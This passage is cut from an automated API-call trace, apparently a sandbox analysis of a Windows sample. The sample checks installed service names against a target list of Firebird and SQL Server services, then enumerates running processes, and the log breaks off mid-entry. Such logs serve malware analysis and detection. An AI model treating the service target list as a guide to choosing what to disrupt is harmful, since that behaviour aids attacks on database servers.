(lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0152.987] lstrlenW (lpString="lmhosts") returned 7 [0152.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0152.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0152.987] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0152.987] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0152.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0152.987] lstrlenW (lpString="LSM") returned 3 [0152.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0152.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0152.987] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0152.987] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0152.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0152.987] lstrlenW (lpString="MpsSvc") returned 6 [0152.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0152.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0152.987] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0152.987] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0152.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0152.987] lstrlenW (lpString="NcbService") returned 10 [0152.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0152.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0152.987] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0152.987] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0152.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0152.988] lstrlenW (lpString="netprofm") returned 8 [0152.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0152.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0152.988] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0152.988] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0152.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0152.988] lstrlenW (lpString="NgcSvc") returned 6 [0152.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0152.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0152.988] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0152.988] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0152.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0152.988] lstrlenW (lpString="NlaSvc") returned 6 [0152.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0152.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0152.988] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0152.988] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0152.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0152.988] lstrlenW (lpString="nsi") returned 3 [0152.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0152.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0152.988] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0152.988] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0152.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0152.988] lstrlenW (lpString="PcaSvc") returned 6 [0152.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0152.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0152.988] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0152.988] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0152.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0152.988] lstrlenW (lpString="PlugPlay") returned 8 [0152.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0152.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0152.989] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0152.989] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0152.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0152.989] lstrlenW (lpString="Power") returned 5 [0152.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0152.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0152.989] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0152.989] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0152.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0152.989] lstrlenW (lpString="ProfSvc") returned 7 [0152.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0152.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0152.989] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0152.989] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0152.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0152.989] lstrlenW (lpString="RpcEptMapper") returned 12 [0152.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0152.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0152.989] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0152.989] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0152.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0152.989] lstrlenW (lpString="RpcSs") returned 5 [0152.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0152.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0152.989] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0152.989] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0152.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0152.989] lstrlenW (lpString="SamSs") returned 5 [0152.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0152.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0152.989] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0152.990] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0152.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0152.990] lstrlenW (lpString="Schedule") returned 8 [0152.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0152.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0152.990] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0152.990] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0152.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0152.990] lstrlenW (lpString="SecurityHealthService") returned 21 [0152.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0152.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0152.990] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0152.990] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0152.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0152.990] lstrlenW (lpString="SENS") returned 4 [0152.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0152.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0152.990] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0152.990] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0152.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0152.990] lstrlenW (lpString="ShellHWDetection") returned 16 [0152.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0152.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0152.990] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0152.990] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0152.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0152.990] lstrlenW (lpString="Spooler") returned 7 [0152.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0152.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0152.990] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0152.990] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0152.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0152.991] lstrlenW (lpString="StateRepository") returned 15 [0152.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0152.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0152.991] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0152.991] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0152.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0152.991] lstrlenW (lpString="SysMain") returned 7 [0152.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0152.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0152.991] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0152.991] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0152.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0152.991] lstrlenW (lpString="SystemEventsBroker") returned 18 [0152.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0152.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0152.991] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0152.991] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0152.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0152.991] lstrlenW (lpString="Themes") returned 6 [0152.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0152.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0152.991] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0152.991] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0152.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0152.991] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0152.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0152.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0152.991] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0152.991] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0152.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0152.991] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0152.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0152.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0152.992] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0152.992] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0152.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e52e8 | out: hHeap=0x6a0000) returned 1 [0152.992] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240 [0152.997] Process32FirstW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.997] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0152.998] lstrlenW (lpString="System") returned 6 [0152.998] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0152.999] lstrlenW (lpString="smss.exe") returned 8 [0152.999] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.999] lstrlenW (lpString="csrss.exe") returned 9 [0152.999] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0153.000] lstrlenW (lpString="wininit.exe") returned 11 [0153.000] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.000] lstrlenW (lpString="csrss.exe") returned 9 [0153.000] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0153.001] lstrlenW (lpString="winlogon.exe") returned 12 [0153.001] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0153.002] lstrlenW (lpString="services.exe") returned 12 [0153.002] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0153.002] lstrlenW (lpString="lsass.exe") returned 9 [0153.003] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0153.003] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0153.003] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0153.004] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0153.004] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.004] lstrlenW (lpString="svchost.exe") returned 11 [0153.004] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.005] lstrlenW (lpString="svchost.exe") returned 11 [0153.005] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0153.006] lstrlenW (lpString="dwm.exe") returned 7 [0153.006] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.006] lstrlenW (lpString="svchost.exe") returned 11 [0153.006] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.007] lstrlenW (lpString="svchost.exe") returned 11 [0153.007] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.008] lstrlenW (lpString="svchost.exe") returned 11 [0153.008] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.008] lstrlenW (lpString="svchost.exe") returned 11 [0153.008] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.009] lstrlenW (lpString="svchost.exe") returned 11 [0153.009] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.010] lstrlenW (lpString="svchost.exe") returned 11 [0153.010] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.010] lstrlenW (lpString="svchost.exe") returned 11 [0153.010] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.011] lstrlenW (lpString="svchost.exe") returned 11 [0153.011] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.012] lstrlenW (lpString="svchost.exe") returned 11 [0153.012] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.012] lstrlenW (lpString="svchost.exe") returned 11 [0153.012] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0153.013] lstrlenW (lpString="spoolsv.exe") returned 11 [0153.013] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.013] lstrlenW (lpString="svchost.exe") returned 11 [0153.014] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0153.014] lstrlenW (lpString="audiodg.exe") returned 11 [0153.014] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0153.015] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0153.015] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0153.015] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0153.015] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0153.016] lstrlenW (lpString="Memory Compression") returned 18 [0153.016] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0153.017] lstrlenW (lpString="sihost.exe") returned 10 [0153.017] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.017] lstrlenW (lpString="svchost.exe") returned 11 [0153.017] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0153.067] lstrlenW (lpString="msoia.exe") returned 9 [0153.067] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0153.067] lstrlenW (lpString="taskhostw.exe") returned 13 [0153.067] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0153.068] lstrlenW (lpString="explorer.exe") returned 12 [0153.068] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0153.069] lstrlenW (lpString="SearchUI.exe") returned 12 [0153.069] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0153.069] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0153.070] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0153.070] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0153.070] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, 